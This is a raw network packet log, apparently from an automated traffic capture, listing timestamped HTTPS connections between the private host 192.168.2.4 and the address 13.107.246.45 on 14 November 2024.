                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.733143091 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.734443903 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.734463930 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.734961033 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.734977961 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.831985950 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.832076073 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.832264900 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.832266092 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.832369089 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.832377911 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.834636927 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.834691048 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.834897995 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.834985018 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.835002899 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.846771955 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.846839905 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.847007990 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.847007990 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.847034931 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.847044945 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.849096060 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.849112034 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.849536896 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.849536896 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.849558115 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.850904942 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.850939989 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.850987911 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.851124048 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.851124048 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.851139069 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.851172924 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.851178885 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.852986097 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.853008032 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.853224993 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.853224993 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.853279114 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.863054037 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.863214970 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.863332033 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.863332033 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.864118099 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.864135981 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.865418911 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.865447998 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.865658045 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.865658045 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:49.865700960 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.305180073 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.305577040 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.305598974 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.306418896 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.306427956 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437163115 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437244892 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437278986 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437302113 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437350988 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.437396049 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.438611031 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.438623905 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.438658953 CET49770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.438664913 CET4434977013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.445723057 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.445816994 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.445893049 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.446166992 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.446190119 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.592359066 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.592921019 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.592932940 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.593383074 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.593389988 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.596136093 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.596543074 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.596565008 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.596960068 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.596966028 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.597934008 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.598248959 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.598258972 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.598680973 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.598685980 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.602176905 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.602484941 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.602507114 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.602869987 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.602878094 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722074032 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722157001 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722214937 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722343922 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722388029 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722419024 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.722434044 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.724909067 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.724920988 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.724972010 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.725126028 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.725140095 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727125883 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727236986 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727251053 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727277994 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727287054 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727292061 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727300882 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727353096 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727360010 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727382898 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727421045 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727425098 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727426052 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727452993 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727482080 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727488041 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727492094 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727495909 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727507114 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.727509975 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729744911 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729779005 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729832888 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729927063 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729974985 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.729975939 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.730004072 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.730015993 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.730158091 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.730201006 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737188101 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737242937 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737291098 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737396955 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737412930 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737442970 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.737453938 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.739262104 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.739295006 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.739348888 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.739487886 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:50.739501953 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.186141968 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.186649084 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.186693907 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.187060118 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.187071085 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.321681023 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.321846008 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.322046995 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.322046995 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.322096109 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.322114944 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.324337006 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.324440956 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.324613094 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.324691057 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.324714899 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.459283113 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.459799051 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.459836960 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.460230112 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.460235119 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.465116024 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.465464115 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.465524912 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.465822935 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.465837955 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.471837044 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.472240925 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.472259998 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.472449064 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.472455025 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.485532999 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.486128092 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.486149073 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.486210108 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.486212969 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.587714911 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.587915897 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.587976933 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.588114023 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.588114023 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.588114023 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.588788033 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.588803053 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.591346025 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.591383934 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.591540098 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.591799021 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.591809988 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.594804049 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.594875097 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.595099926 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.595099926 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.595099926 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.597054958 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.597104073 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.597213030 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.597311020 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.597332001 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.603964090 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.604077101 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.604296923 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.604296923 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.604418993 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.604432106 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.606147051 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.606177092 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.606334925 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.606384993 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.606393099 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.617850065 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.617897034 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.618084908 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.618084908 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.618136883 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.618149996 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.620189905 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.620281935 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.620487928 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.620487928 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.620573044 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.826267958 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:51.826337099 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.060194969 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.061383963 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.061383963 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.061451912 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.061499119 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191082954 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191154957 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191270113 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191550970 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191550970 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191829920 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.191873074 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.194875002 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.194909096 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.195332050 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.195332050 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.195358992 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.341372013 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.341859102 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.341892958 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.342495918 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.342511892 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.351389885 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.351751089 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.351772070 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.352302074 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.352307081 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468321085 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468389034 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468442917 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468664885 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468688011 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468708992 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.468717098 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.471682072 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.471776962 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.471864939 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.471977949 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.472017050 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482249022 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482291937 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482352972 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482498884 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482513905 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482522964 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.482527971 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.484802008 CET49793443192.168.2.413.107.246.45
